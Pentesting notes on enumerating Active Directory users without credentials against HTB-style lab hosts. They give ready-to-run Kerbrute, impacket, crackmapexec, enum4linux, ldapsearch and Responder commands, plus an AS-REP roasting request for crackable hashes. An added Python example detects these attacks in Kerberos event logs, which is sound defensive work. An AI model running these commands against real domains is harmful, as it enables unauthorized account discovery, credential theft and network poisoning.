Pentesting Notes

Enumerating users (No credentials)

Looking for a foothold, eh?


Last updated 5 months ago

Kerbrute usernames

A tool to quickly brute-force and enumerate valid Active Directory accounts through Kerberos pre-authentication.

./kerbrute_linux_amd64 userenum -d rebound.htb --dc 10.10.11.231 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

Getting users with impacket-lookupsid

impacket-lookupsid rebound.htb/anon@10.10.11.231

Crackmapexec rid-brute

crackmapexec smb rebound.htb -u anonymous -p "" --rid-brute 10000

AS-REP Roasting

AS-REP roasting is an attack against Kerberos for users that don't require pre-authentication. During pre-authentication, a user enters their password, which is used to encrypt a timestamp; the domain controller then attempts to decrypt it and validates that the right password was used and that the request is not a replay of an earlier one. From there, the TGT is issued for the user to use for future authentication. If pre-authentication is disabled, an attacker could request authentication data for any user and the DC would return an encrypted TGT that can be brute-forced offline.

impacket-GetNPUsers zsm.local/marcus -no-pass -request -format hashcat -outputfile outfile
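Two of the patterns above leave a distinctive trail on the domain controller: Kerbrute-style username enumeration produces bursts of Kerberos TGT requests (Security Event ID 4768) failing with status 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) from a single source, and AS-REP roasting shows up as a successful 4768 with Pre-Authentication Type 0 and RC4 (0x17) ticket encryption. The following Python is an added example, not part of the original notes or of either tool, that runs this detection logic over a handful of constructed 4768 records; the field names follow the 4768 event schema, while the key=value flattening, the sample values and the threshold of five failures are assumptions of the example.

```python
"""
Detection logic for two noisy Kerberos patterns seen from a domain controller:
  * username enumeration (Kerbrute-style): many Event ID 4768 records failing with
    Status 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) from one source IP
  * AS-REP roasting: a successful 4768 with PreAuthType 0 (no pre-auth) and
    TicketEncryptionType 0x17 (RC4-HMAC), i.e. an offline-crackable AS-REP
The records below are constructed for this example, not real logs.
"""
import re
from collections import Counter

# Constructed sample of Security Event 4768 records flattened to key=value pairs
# (field names match the 4768 event schema; values are made up).
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=jdoe IpAddress=::ffff:10.10.14.5 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff",
    "EventID=4768 TargetUserName=asmith IpAddress=::ffff:10.10.14.5 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff",
    "EventID=4768 TargetUserName=bwayne IpAddress=::ffff:10.10.14.5 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff",
    "EventID=4768 TargetUserName=ckent IpAddress=::ffff:10.10.14.5 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff",
    "EventID=4768 TargetUserName=dprince IpAddress=::ffff:10.10.14.5 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff",
    "EventID=4768 TargetUserName=hjordan IpAddress=::ffff:10.10.14.5 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff",
    # a single typo from a workstation: below the burst threshold, should not alert
    "EventID=4768 TargetUserName=alcie IpAddress=::ffff:10.10.14.9 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff",
    # normal logon: encrypted-timestamp pre-auth (type 2) and AES256 (0x12)
    "EventID=4768 TargetUserName=alice IpAddress=::ffff:10.10.14.9 Status=0x0 PreAuthType=2 TicketEncryptionType=0x12",
    # AS-REP roasting: no pre-auth, RC4 ticket, from the same source as the burst
    "EventID=4768 TargetUserName=marcus IpAddress=::ffff:10.10.14.5 Status=0x0 PreAuthType=0 TicketEncryptionType=0x17",
]

PRINCIPAL_UNKNOWN = "0x6"   # KDC_ERR_C_PRINCIPAL_UNKNOWN
SUCCESS = "0x0"
NO_PREAUTH = "0"
RC4_HMAC = "0x17"
ENUM_THRESHOLD = 5          # assumed burst size; tune to the environment


def parse_event(line):
    """Turn a flattened key=value record into a dict (assumed log format)."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def detect_username_enumeration(events, threshold=ENUM_THRESHOLD):
    """Return {source_ip: failure_count} for sources exceeding the 0x6 threshold."""
    failures = Counter()
    for ev in events:
        if ev.get("EventID") == "4768" and ev.get("Status", "").lower() == PRINCIPAL_UNKNOWN:
            failures[ev.get("IpAddress", "?")] += 1
    return {ip: n for ip, n in failures.items() if n >= threshold}


def detect_asrep_roasting(events):
    """Return (user, source_ip) for successful TGT requests without pre-auth using RC4."""
    hits = []
    for ev in events:
        if (ev.get("EventID") == "4768"
                and ev.get("Status", "").lower() == SUCCESS
                and ev.get("PreAuthType") == NO_PREAUTH
                and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC):
            hits.append((ev.get("TargetUserName", "?"), ev.get("IpAddress", "?")))
    return hits


def analyze(lines, threshold=ENUM_THRESHOLD):
    """Run both detections over raw record lines and return the findings."""
    events = [parse_event(line) for line in lines]
    return {
        "enumeration": detect_username_enumeration(events, threshold),
        "asrep_roast": detect_asrep_roasting(events),
    }


if __name__ == "__main__":
    findings = analyze(SAMPLE_EVENTS)
    for ip, count in findings["enumeration"].items():
        print(f"[!] possible username enumeration from {ip}: {count} unknown-principal failures")
    for user, ip in findings["asrep_roast"]:
        print(f"[!] AS-REP without pre-auth for {user} (RC4) requested from {ip}")
```

The enumeration rule keys on the source address rather than the user name because each probe targets a different (usually non-existent) account; the roasting rule keys on the account, since the fix is on that account (re-enable "require Kerberos pre-authentication" and prefer AES), not on the client.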

Guest access smb share

First list all shares:

smbclient -L //10.10.110.55
crackmapexec smb 192.168.210.10 -u 'a' -p '' --shares
enum4linux -a -u "" -p "" 10.10.110.55 && enum4linux -a -u "guest" -p "" 10.10.110.55

Connect to share:

smbclient //10.10.110.55/sharename

Enumerate LDAP

ldapsearch -x -h 10.10.110.55 -s base
nmap -n -sV --script "ldap* and not brute" -p 389 10.10.110.55

Relay/poisoning

sudo responder -I tun0 -v

AD-enumerator.py

Windows Active Directory enumeration tool for Linux, written in Python. Can be used to quickly enumerate popular services on a Windows Domain Controller.

ad-enumerator.py -t 10.10.10.10 -A

Release v1.0.3 · ropnop/kerbrute (GitHub)
GitHub - 1ncendium/AD-Enumerator: Windows Active Directory enumeration tool for Linux